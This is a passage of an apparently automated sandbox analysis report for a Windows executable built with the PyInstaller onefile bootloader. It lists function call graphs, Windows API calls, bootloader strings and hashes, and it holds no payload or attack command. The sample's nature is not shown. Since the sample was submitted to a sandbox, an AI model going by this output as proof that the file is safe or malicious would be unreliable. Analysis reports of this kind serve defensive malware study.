calls 19122->19126 19125->19093 19127 7ff67aef269c 19126->19127 19128 7ff67aef2334 65 API calls 19127->19128 19128->19125 19130 7ff67aee4fbc 45 API calls 19129->19130 19131 7ff67aef2048 19130->19131 19132 7ff67aef2054 GetOEMCP 19131->19132 19133 7ff67aef2066 19131->19133 19134 7ff67aef207b 19132->19134 19133->19134 19135 7ff67aef206b GetACP 19133->19135 19134->19096 19134->19112 19135->19134 19137 7ff67aef2034 47 API calls 19136->19137 19138 7ff67aef2709 19137->19138 19139 7ff67aef285f 19138->19139 19141 7ff67aef2746 IsValidCodePage 19138->19141 19146 7ff67aef2760 memcpy_s 19138->19146 19140 7ff67aedc5c0 _log10_special 8 API calls 19139->19140 19142 7ff67aef24a1 19140->19142 19141->19139 19143 7ff67aef2757 19141->19143 19142->19103 19142->19107 19144 7ff67aef2786 GetCPInfo 19143->19144 19143->19146 19144->19139 19144->19146 19163 7ff67aef214c 19146->19163 19229 7ff67aef0348 EnterCriticalSection 19147->19229 19164 7ff67aef2189 GetCPInfo 19163->19164 19173 7ff67aef227f 19163->19173 19170 7ff67aef219c 19164->19170 19164->19173 19165 7ff67aedc5c0 _log10_special 8 API calls 19166 7ff67aef231e 19165->19166 19166->19139 19167 7ff67aef2eb0 48 API calls 19168 7ff67aef2213 19167->19168 19174 7ff67aef7bf4 19168->19174 19170->19167 19172 7ff67aef7bf4 54 API calls 19172->19173 19173->19165 19175 7ff67aee4fbc 45 API calls 19174->19175 19176 7ff67aef7c19 19175->19176 19179 7ff67aef78c0 19176->19179 19180 7ff67aef7901 19179->19180 19181 7ff67aeef910 _fread_nolock MultiByteToWideChar 19180->19181 19185 7ff67aef794b 19181->19185 19182 7ff67aef7bc9 19184 7ff67aedc5c0 _log10_special 8 API calls 19182->19184 19183 7ff67aef7a81 19183->19182 19188 7ff67aeea9b8 __free_lconv_mon 11 API calls 19183->19188 19186 7ff67aef2246 19184->19186 19185->19182 19185->19183 19187 7ff67aeed66c _fread_nolock 12 API calls 19185->19187 19189 7ff67aef7983 19185->19189 19186->19172 19187->19189 19188->19182 19189->19183 19190 7ff67aeef910 _fread_nolock MultiByteToWideChar 19189->19190 19191 7ff67aef79f6 19190->19191 19191->19183 19210 7ff67aeef154 19191->19210 19194 7ff67aef7a92 19196 7ff67aeed66c _fread_nolock 12 API calls 19194->19196 19198 7ff67aef7b64 19194->19198 19200 7ff67aef7ab0 19194->19200 19195 7ff67aef7a41 19195->19183 19197 7ff67aeef154 __crtLCMapStringW 6 API calls 19195->19197 19196->19200 19197->19183 19198->19183 19199 7ff67aeea9b8 __free_lconv_mon 11 API calls 19198->19199 19199->19183 19200->19183 19201 7ff67aeef154 __crtLCMapStringW 6 API calls 19200->19201 19202 7ff67aef7b30 19201->19202 19202->19198 19203 7ff67aef7b50 19202->19203 19204 7ff67aef7b66 19202->19204 19205 7ff67aef0858 WideCharToMultiByte 19203->19205 19206 7ff67aef0858 WideCharToMultiByte 19204->19206 19207 7ff67aef7b5e 19205->19207 19206->19207 19207->19198 19208 7ff67aef7b7e 19207->19208 19208->19183 19209 7ff67aeea9b8 __free_lconv_mon 11 API calls 19208->19209 19209->19183 19216 7ff67aeeed80 19210->19216 19214 7ff67aeef19a 19214->19183 19214->19194 19214->19195 19215 7ff67aeef203 LCMapStringW 19215->19214 19217 7ff67aeeedd8 __vcrt_InitializeCriticalSectionEx 19216->19217 19218 7ff67aeeeddd 19216->19218 19217->19218 19219 7ff67aeeee0d LoadLibraryExW 19217->19219 19220 7ff67aeeef02 GetProcAddress 19217->19220 19225 7ff67aeeee6c LoadLibraryExW 19217->19225 19218->19214 19226 7ff67aeef240 19218->19226 19221 7ff67aeeeee2 19219->19221 19222 7ff67aeeee32 GetLastError 19219->19222 19220->19218 19224 7ff67aeeef13 19220->19224 19221->19220 19223 7ff67aeeeef9 FreeLibrary 19221->19223 19222->19217 19223->19220 19224->19218 19225->19217 19225->19221 19227 7ff67aeeed80 __crtLCMapStringW 5 API calls 19226->19227 19228 7ff67aeef26e __crtLCMapStringW 19227->19228 19228->19215 19231 7ff67aee951d 19230->19231 19232 7ff67aee93b9 19230->19232 19233 7ff67aee9546 19231->19233 19234 7ff67aeea9b8 __free_lconv_mon 11 API calls 19231->19234 19232->19066 19235 7ff67aeea9b8 __free_lconv_mon 11 API calls 19233->19235 19234->19231 19235->19232 19237 7ff67aef6331 19236->19237 19238 7ff67aef6348 19236->19238 19239 7ff67aee4f78 memcpy_s 11 API calls 19237->19239 19238->19237 19241 7ff67aef6356 19238->19241 19240 7ff67aef6336 19239->19240 19242 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19240->19242 19243 7ff67aee4fbc 45 API calls 19241->19243 19244 7ff67aef6341 19241->19244 19242->19244 19243->19244 19244->18903 19246 7ff67aee4fbc 45 API calls 19245->19246 19247 7ff67aef8fe1 19246->19247 19250 7ff67aef8c38 19247->19250 19252 7ff67aef8c86 19250->19252 19251 7ff67aedc5c0 _log10_special 8 API calls 19253 7ff67aef7275 19251->19253 19254 7ff67aef8d0d 19252->19254 19256 7ff67aef8cf8 GetCPInfo 19252->19256 19259 7ff67aef8d11 19252->19259 19253->18903 19253->18929 19255 7ff67aeef910 _fread_nolock MultiByteToWideChar 19254->19255 19254->19259 19257 7ff67aef8da5 19255->19257 19256->19254 19256->19259 19258 7ff67aeed66c _fread_nolock 12 API calls 19257->19258 19257->19259 19260 7ff67aef8ddc 19257->19260 19258->19260 19259->19251 19260->19259 19261 7ff67aeef910 _fread_nolock MultiByteToWideChar 19260->19261 19262 7ff67aef8e4a 19261->19262 19263 7ff67aeef910 _fread_nolock MultiByteToWideChar 19262->19263 19272 7ff67aef8f2c 19262->19272 19265 7ff67aef8e70 19263->19265 19264 7ff67aeea9b8 __free_lconv_mon 11 API calls 19264->19259 19266 7ff67aeed66c _fread_nolock 12 API calls 19265->19266 19267 7ff67aef8e9d 19265->19267 19265->19272 19266->19267 19268 7ff67aeef910 _fread_nolock MultiByteToWideChar 19267->19268 19267->19272 19269 7ff67aef8f14 19268->19269 19270 7ff67aef8f34 19269->19270 19271 7ff67aef8f1a 19269->19271 19279 7ff67aeeefd8 19270->19279 19271->19272 19274 7ff67aeea9b8 __free_lconv_mon 11 API calls 19271->19274 19272->19259 19272->19264 19274->19272 19276 7ff67aef8f73 19276->19259 19278 7ff67aeea9b8 __free_lconv_mon 11 API calls 19276->19278 19277 7ff67aeea9b8 __free_lconv_mon 11 API calls 19277->19276 19278->19259 19280 7ff67aeeed80 __crtLCMapStringW 5 API calls 19279->19280 19281 7ff67aeef016 19280->19281 19282 7ff67aeef01e 19281->19282 19283 7ff67aeef240 __crtLCMapStringW 5 API calls 19281->19283 19282->19276 19282->19277 19284 7ff67aeef087 CompareStringW 19283->19284 19284->19282 19286 7ff67aef7cb1 19285->19286 19287 7ff67aef7cca HeapSize 19285->19287 19288 7ff67aee4f78 memcpy_s 11 API calls 19286->19288 19289 7ff67aef7cb6 19288->19289 19290 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19289->19290 19291 7ff67aef7cc1 19290->19291 19291->18933 19293 7ff67aef7d03 19292->19293 19294 7ff67aef7cf9 19292->19294 19296 7ff67aef7d08 19293->19296 19302 7ff67aef7d0f memcpy_s 19293->19302 19295 7ff67aeed66c _fread_nolock 12 API calls 19294->19295 19301 7ff67aef7d01 19295->19301 19299 7ff67aeea9b8 __free_lconv_mon 11 API calls 19296->19299 19297 7ff67aef7d15 19300 7ff67aee4f78 memcpy_s 11 API calls 19297->19300 19298 7ff67aef7d42 HeapReAlloc 19298->19301 19298->19302 19299->19301 19300->19301 19301->18938 19302->19297 19302->19298 19303 7ff67aef3600 memcpy_s 2 API calls 19302->19303 19303->19302 19305 7ff67aeeed80 __crtLCMapStringW 5 API calls 19304->19305 19306 7ff67aeeefb4 19305->19306 19306->18943 19308 7ff67aee556a 19307->19308 19309 7ff67aee5546 19307->19309 19310 7ff67aee55c4 19308->19310 19311 7ff67aee556f 19308->19311 19313 7ff67aeea9b8 __free_lconv_mon 11 API calls 19309->19313 19314 7ff67aee5555 19309->19314 19312 7ff67aeef910 _fread_nolock MultiByteToWideChar 19310->19312 19311->19314 19315 7ff67aee5584 19311->19315 19318 7ff67aeea9b8 __free_lconv_mon 11 API calls 19311->19318 19322 7ff67aee55e0 19312->19322 19313->19314 19314->18946 19314->18947 19316 7ff67aeed66c _fread_nolock 12 API calls 19315->19316 19316->19314 19317 7ff67aee55e7 GetLastError 19319 7ff67aee4eec _fread_nolock 11 API calls 19317->19319 19318->19315 19321 7ff67aee55f4 19319->19321 19320 7ff67aeef910 _fread_nolock MultiByteToWideChar 19324 7ff67aee5666 19320->19324 19325 7ff67aee4f78 memcpy_s 11 API calls 19321->19325 19322->19317 19326 7ff67aeea9b8 __free_lconv_mon 11 API calls 19322->19326 19327 7ff67aee5622 19322->19327 19328 7ff67aee5615 19322->19328 19323 7ff67aeed66c _fread_nolock 12 API calls 19323->19327 19324->19314 19324->19317 19325->19314 19326->19328 19327->19314 19327->19320 19328->19323 19330 7ff67aee9295 19329->19330 19337 7ff67aee9291 19329->19337 19350 7ff67aef2aac GetEnvironmentStringsW 19330->19350 19333 7ff67aee92a2 19336 7ff67aeea9b8 __free_lconv_mon 11 API calls 19333->19336 19334 7ff67aee92ae 19357 7ff67aee93fc 19334->19357 19336->19337 19337->18977 19342 7ff67aee963c 19337->19342 19339 7ff67aeea9b8 __free_lconv_mon 11 API calls 19340 7ff67aee92d5 19339->19340 19341 7ff67aeea9b8 __free_lconv_mon 11 API calls 19340->19341 19341->19337 19343 7ff67aee965f 19342->19343 19347 7ff67aee9676 19342->19347 19343->18977 19344 7ff67aeef910 MultiByteToWideChar _fread_nolock 19344->19347 19345 7ff67aeeec08 memcpy_s 11 API calls 19345->19347 19346 7ff67aee96ea 19348 7ff67aeea9b8 __free_lconv_mon 11 API calls 19346->19348 19347->19343 19347->19344 19347->19345 19347->19346 19349 7ff67aeea9b8 __free_lconv_mon 11 API calls 19347->19349 19348->19343 19349->19347 19351 7ff67aee929a 19350->19351 19352 7ff67aef2ad0 19350->19352 19351->19333 19351->19334 19353 7ff67aeed66c _fread_nolock 12 API calls 19352->19353 19354 7ff67aef2b07 memcpy_s 19353->19354 19355 7ff67aeea9b8 __free_lconv_mon 11 API calls 19354->19355 19356 7ff67aef2b27 FreeEnvironmentStringsW 19355->19356 19356->19351 19358 7ff67aee9424 19357->19358 19359 7ff67aeeec08 memcpy_s 11 API calls 19358->19359 19371 7ff67aee945f 19359->19371 19360 7ff67aee9467 19361 7ff67aeea9b8 __free_lconv_mon 11 API calls 19360->19361 19362 7ff67aee92b6 19361->19362 19362->19339 19363 7ff67aee94e1 19364 7ff67aeea9b8 __free_lconv_mon 11 API calls 19363->19364 19364->19362 19365 7ff67aeeec08 memcpy_s 11 API calls 19365->19371 19366 7ff67aee94d0 19368 7ff67aee9518 11 API calls 19366->19368 19367 7ff67aef04e4 37 API calls 19367->19371 19369 7ff67aee94d8 19368->19369 19372 7ff67aeea9b8 __free_lconv_mon 11 API calls 19369->19372 19370 7ff67aee9504 19373 7ff67aeea970 _isindst 17 API calls 19370->19373 19371->19360 19371->19363 19371->19365 19371->19366 19371->19367 19371->19370 19374 7ff67aeea9b8 __free_lconv_mon 11 API calls 19371->19374 19372->19360 19375 7ff67aee9516 19373->19375 19374->19371 19378 7ff67aef8ba1 __crtLCMapStringW 19376->19378 19377 7ff67aef715e 19377->19001 19377->19002 19378->19377 19379 7ff67aeeefd8 6 API calls 19378->19379 19379->19377

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF67AED8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff67aed8bd0-7ff67aed8d16 call 7ff67aedc8c0 call 7ff67aed9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff67aee5460 call 7ff67aeea4ec call 7ff67aee878c call 7ff67aee5460 call 7ff67aeea4ec call 7ff67aee878c call 7ff67aee5460 call 7ff67aeea4ec call 7ff67aee878c GetCommandLineW CreateProcessW 23 7ff67aed8d3d-7ff67aed8d79 RegisterClassW 0->23 24 7ff67aed8d18-7ff67aed8d38 GetLastError call 7ff67aed2c50 0->24 26 7ff67aed8d81-7ff67aed8dd5 CreateWindowExW 23->26 27 7ff67aed8d7b GetLastError 23->27 32 7ff67aed9029-7ff67aed904f call 7ff67aedc5c0 24->32 28 7ff67aed8ddf-7ff67aed8de4 ShowWindow 26->28 29 7ff67aed8dd7-7ff67aed8ddd GetLastError 26->29 27->26 31 7ff67aed8dea-7ff67aed8dfa WaitForSingleObject 28->31 29->31 33 7ff67aed8dfc 31->33 34 7ff67aed8e78-7ff67aed8e7f 31->34 37 7ff67aed8e00-7ff67aed8e03 33->37 38 7ff67aed8ec2-7ff67aed8ec9 34->38 39 7ff67aed8e81-7ff67aed8e91 WaitForSingleObject 34->39 42 7ff67aed8e05 GetLastError 37->42 43 7ff67aed8e0b-7ff67aed8e12 37->43 40 7ff67aed8ecf-7ff67aed8ee5 QueryPerformanceFrequency QueryPerformanceCounter 38->40 41 7ff67aed8fb0-7ff67aed8fc9 GetMessageW 38->41 44 7ff67aed8e97-7ff67aed8ea7 TerminateProcess 39->44 45 7ff67aed8fe8-7ff67aed8ff2 39->45 46 7ff67aed8ef0-7ff67aed8f28 MsgWaitForMultipleObjects PeekMessageW 40->46 48 7ff67aed8fdf-7ff67aed8fe6 41->48 49 7ff67aed8fcb-7ff67aed8fd9 TranslateMessage DispatchMessageW 41->49 42->43 43->39 47 7ff67aed8e14-7ff67aed8e31 PeekMessageW 43->47 52 7ff67aed8eaf-7ff67aed8ebd WaitForSingleObject 44->52 53 7ff67aed8ea9 GetLastError 44->53 50 7ff67aed8ff4-7ff67aed8ffa DestroyWindow 45->50 51 7ff67aed9001-7ff67aed9025 GetExitCodeProcess CloseHandle * 2 45->51 54 7ff67aed8f63-7ff67aed8f6a 46->54 55 7ff67aed8f2a 46->55 56 7ff67aed8e33-7ff67aed8e64 TranslateMessage DispatchMessageW PeekMessageW 47->56 57 7ff67aed8e66-7ff67aed8e76 WaitForSingleObject 47->57 48->41 48->45 49->48 50->51 51->32 52->45 53->52 54->41 59 7ff67aed8f6c-7ff67aed8f95 QueryPerformanceCounter 54->59 58 7ff67aed8f30-7ff67aed8f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->34 57->37 58->54 58->58 59->46 60 7ff67aed8f9b-7ff67aed8fa2 59->60 60->45 61 7ff67aed8fa4-7ff67aed8fa8 60->61 61->41
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction ID: 69b5a666fe98631bca6c1411317543d8f2af48f00ae4850d0e564a3bbcc7d722
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D19133A28A8286EB50AF74E8542AD3764FF84B58F504279DE5D83AB4DF3CD544DB00
                                                                                                                                                                                                                                          Function 00007FF67AED1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 62 7ff67aed1000-7ff67aed3806 call 7ff67aedfe88 call 7ff67aedfe90 call 7ff67aedc8c0 call 7ff67aee5460 call 7ff67aee54f4 call 7ff67aed36b0 76 7ff67aed3814-7ff67aed3836 call 7ff67aed1950 62->76 77 7ff67aed3808-7ff67aed380f 62->77 83 7ff67aed391b-7ff67aed3931 call 7ff67aed45b0 76->83 84 7ff67aed383c-7ff67aed3856 call 7ff67aed1c80 76->84 78 7ff67aed3c97-7ff67aed3cb2 call 7ff67aedc5c0 77->78 89 7ff67aed3933-7ff67aed3960 call 7ff67aed7f80 83->89 90 7ff67aed396a-7ff67aed397f call 7ff67aed2710 83->90 88 7ff67aed385b-7ff67aed389b call 7ff67aed8a20 84->88 97 7ff67aed38c1-7ff67aed38cc call 7ff67aee4fa0 88->97 98 7ff67aed389d-7ff67aed38a3 88->98 100 7ff67aed3962-7ff67aed3965 call 7ff67aee00bc 89->100 101 7ff67aed3984-7ff67aed39a6 call 7ff67aed1c80 89->101 102 7ff67aed3c8f 90->102 110 7ff67aed38d2-7ff67aed38e1 call 7ff67aed8a20 97->110 111 7ff67aed39fc-7ff67aed3a2a call 7ff67aed8b30 call 7ff67aed8b90 * 3 97->111 103 7ff67aed38a5-7ff67aed38ad 98->103 104 7ff67aed38af-7ff67aed38bd call 7ff67aed8b90 98->104 100->90 115 7ff67aed39b0-7ff67aed39b9 101->115 102->78 103->104 104->97 119 7ff67aed39f4-7ff67aed39f7 call 7ff67aee4fa0 110->119 120 7ff67aed38e7-7ff67aed38ed 110->120 138 7ff67aed3a2f-7ff67aed3a3e call 7ff67aed8a20 111->138 115->115 118 7ff67aed39bb-7ff67aed39d8 call 7ff67aed1950 115->118 118->88 127 7ff67aed39de-7ff67aed39ef call 7ff67aed2710 118->127 119->111 125 7ff67aed38f0-7ff67aed38fc 120->125 128 7ff67aed3905-7ff67aed3908 125->128 129 7ff67aed38fe-7ff67aed3903 125->129 127->102 128->119 132 7ff67aed390e-7ff67aed3916 call 7ff67aee4fa0 128->132 129->125 129->128 132->138 141 7ff67aed3a44-7ff67aed3a47 138->141 142 7ff67aed3b45-7ff67aed3b53 138->142 141->142 143 7ff67aed3a4d-7ff67aed3a50 141->143 144 7ff67aed3a67 142->144 145 7ff67aed3b59-7ff67aed3b5d 142->145 146 7ff67aed3b14-7ff67aed3b17 143->146 147 7ff67aed3a56-7ff67aed3a5a 143->147 148 7ff67aed3a6b-7ff67aed3a90 call 7ff67aee4fa0 144->148 145->148 150 7ff67aed3b2f-7ff67aed3b40 call 7ff67aed2710 146->150 151 7ff67aed3b19-7ff67aed3b1d 146->151 147->146 149 7ff67aed3a60 147->149 157 7ff67aed3a92-7ff67aed3aa6 call 7ff67aed8b30 148->157 158 7ff67aed3aab-7ff67aed3ac0 148->158 149->144 159 7ff67aed3c7f-7ff67aed3c87 150->159 151->150 153 7ff67aed3b1f-7ff67aed3b2a 151->153 153->148 157->158 161 7ff67aed3ac6-7ff67aed3aca 158->161 162 7ff67aed3be8-7ff67aed3bfa call 7ff67aed8a20 158->162 159->102 164 7ff67aed3ad0-7ff67aed3ae8 call 7ff67aee52c0 161->164 165 7ff67aed3bcd-7ff67aed3be2 call 7ff67aed1940 161->165 170 7ff67aed3c2e 162->170 171 7ff67aed3bfc-7ff67aed3c02 162->171 173 7ff67aed3b62-7ff67aed3b7a call 7ff67aee52c0 164->173 174 7ff67aed3aea-7ff67aed3b02 call 7ff67aee52c0 164->174 165->161 165->162 175 7ff67aed3c31-7ff67aed3c40 call 7ff67aee4fa0 170->175 176 7ff67aed3c04-7ff67aed3c1c 171->176 177 7ff67aed3c1e-7ff67aed3c2c 171->177 187 7ff67aed3b7c-7ff67aed3b80 173->187 188 7ff67aed3b87-7ff67aed3b9f call 7ff67aee52c0 173->188 174->165 184 7ff67aed3b08-7ff67aed3b0f 174->184 185 7ff67aed3d41-7ff67aed3d63 call 7ff67aed44d0 175->185 186 7ff67aed3c46-7ff67aed3c4a 175->186 176->175 177->175 184->165 201 7ff67aed3d65-7ff67aed3d6f call 7ff67aed4620 185->201 202 7ff67aed3d71-7ff67aed3d82 call 7ff67aed1c80 185->202 190 7ff67aed3cd4-7ff67aed3ce6 call 7ff67aed8a20 186->190 191 7ff67aed3c50-7ff67aed3c5f call 7ff67aed90e0 186->191 187->188 197 7ff67aed3ba1-7ff67aed3ba5 188->197 198 7ff67aed3bac-7ff67aed3bc4 call 7ff67aee52c0 188->198 206 7ff67aed3d35-7ff67aed3d3c 190->206 207 7ff67aed3ce8-7ff67aed3ceb 190->207 204 7ff67aed3cb3-7ff67aed3cb6 call 7ff67aed8850 191->204 205 7ff67aed3c61 191->205 197->198 198->165 219 7ff67aed3bc6 198->219 215 7ff67aed3d87-7ff67aed3d96 201->215 202->215 218 7ff67aed3cbb-7ff67aed3cbd 204->218 212 7ff67aed3c68 call 7ff67aed2710 205->212 206->212 207->206 213 7ff67aed3ced-7ff67aed3d10 call 7ff67aed1c80 207->213 226 7ff67aed3c6d-7ff67aed3c77 212->226 230 7ff67aed3d12-7ff67aed3d26 call 7ff67aed2710 call 7ff67aee4fa0 213->230 231 7ff67aed3d2b-7ff67aed3d33 call 7ff67aee4fa0 213->231 216 7ff67aed3dc4-7ff67aed3dda call 7ff67aed9400 215->216 217 7ff67aed3d98-7ff67aed3d9f 215->217 233 7ff67aed3ddc 216->233 234 7ff67aed3de8-7ff67aed3e04 SetDllDirectoryW 216->234 217->216 222 7ff67aed3da1-7ff67aed3da5 217->222 224 7ff67aed3cbf-7ff67aed3cc6 218->224 225 7ff67aed3cc8-7ff67aed3ccf 218->225 219->165 222->216 228 7ff67aed3da7-7ff67aed3dbe SetDllDirectoryW LoadLibraryExW 222->228 224->212 225->215 226->159 228->216 230->226 231->215 233->234 238 7ff67aed3f01-7ff67aed3f08 234->238 239 7ff67aed3e0a-7ff67aed3e19 call 7ff67aed8a20 234->239 241 7ff67aed3f0e-7ff67aed3f15 238->241 242 7ff67aed3ffc-7ff67aed4004 238->242 251 7ff67aed3e32-7ff67aed3e3c call 7ff67aee4fa0 239->251 252 7ff67aed3e1b-7ff67aed3e21 239->252 241->242 245 7ff67aed3f1b-7ff67aed3f25 call 7ff67aed33c0 241->245 246 7ff67aed4006-7ff67aed4023 PostMessageW GetMessageW 242->246 247 7ff67aed4029-7ff67aed405b call 7ff67aed36a0 call 7ff67aed3360 call 7ff67aed3670 call 7ff67aed6fb0 call 7ff67aed6d60 242->247 245->226 259 7ff67aed3f2b-7ff67aed3f3f call 7ff67aed90c0 245->259 246->247 261 7ff67aed3ef2-7ff67aed3efc call 7ff67aed8b30 251->261 262 7ff67aed3e42-7ff67aed3e48 251->262 256 7ff67aed3e23-7ff67aed3e2b 252->256 257 7ff67aed3e2d-7ff67aed3e2f 252->257 256->257 257->251 271 7ff67aed3f64-7ff67aed3fa0 call 7ff67aed8b30 call 7ff67aed8bd0 call 7ff67aed6fb0 call 7ff67aed6d60 call 7ff67aed8ad0 259->271 272 7ff67aed3f41-7ff67aed3f5e PostMessageW GetMessageW 259->272 261->238 262->261 266 7ff67aed3e4e-7ff67aed3e54 262->266 269 7ff67aed3e5f-7ff67aed3e61 266->269 270 7ff67aed3e56-7ff67aed3e58 266->270 269->238 275 7ff67aed3e67-7ff67aed3e83 call 7ff67aed6db0 call 7ff67aed7330 269->275 274 7ff67aed3e5a 270->274 270->275 307 7ff67aed3fa5-7ff67aed3fa7 271->307 272->271 274->238 290 7ff67aed3e85-7ff67aed3e8c 275->290 291 7ff67aed3e8e-7ff67aed3e95 275->291 293 7ff67aed3edb-7ff67aed3ef0 call 7ff67aed2a50 call 7ff67aed6fb0 call 7ff67aed6d60 290->293 294 7ff67aed3eaf-7ff67aed3eb9 call 7ff67aed71a0 291->294 295 7ff67aed3e97-7ff67aed3ea4 call 7ff67aed6df0 291->295 293->238 305 7ff67aed3ec4-7ff67aed3ed2 call 7ff67aed74e0 294->305 306 7ff67aed3ebb-7ff67aed3ec2 294->306 295->294 304 7ff67aed3ea6-7ff67aed3ead 295->304 304->293 305->238 319 7ff67aed3ed4 305->319 306->293 310 7ff67aed3fe9-7ff67aed3ff7 call 7ff67aed1900 307->310 311 7ff67aed3fa9-7ff67aed3fb3 call 7ff67aed9200 307->311 310->226 311->310 321 7ff67aed3fb5-7ff67aed3fca 311->321 319->293 322 7ff67aed3fe4 call 7ff67aed2a50 321->322 323 7ff67aed3fcc-7ff67aed3fdf call 7ff67aed2710 call 7ff67aed1900 321->323 322->310 323->226
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                          • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                          • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                          • Instruction ID: cafc582e4898b173757be918cddb94462a8f1988d49ae1e67d160993d5bff82a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A329F23A2C68391FA69BB24D4543B96761AFC4784FA440B6DA4DC32F6EF2CE554E700
                                                                                                                                                                                                                                          Function 00007FF67AEF69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
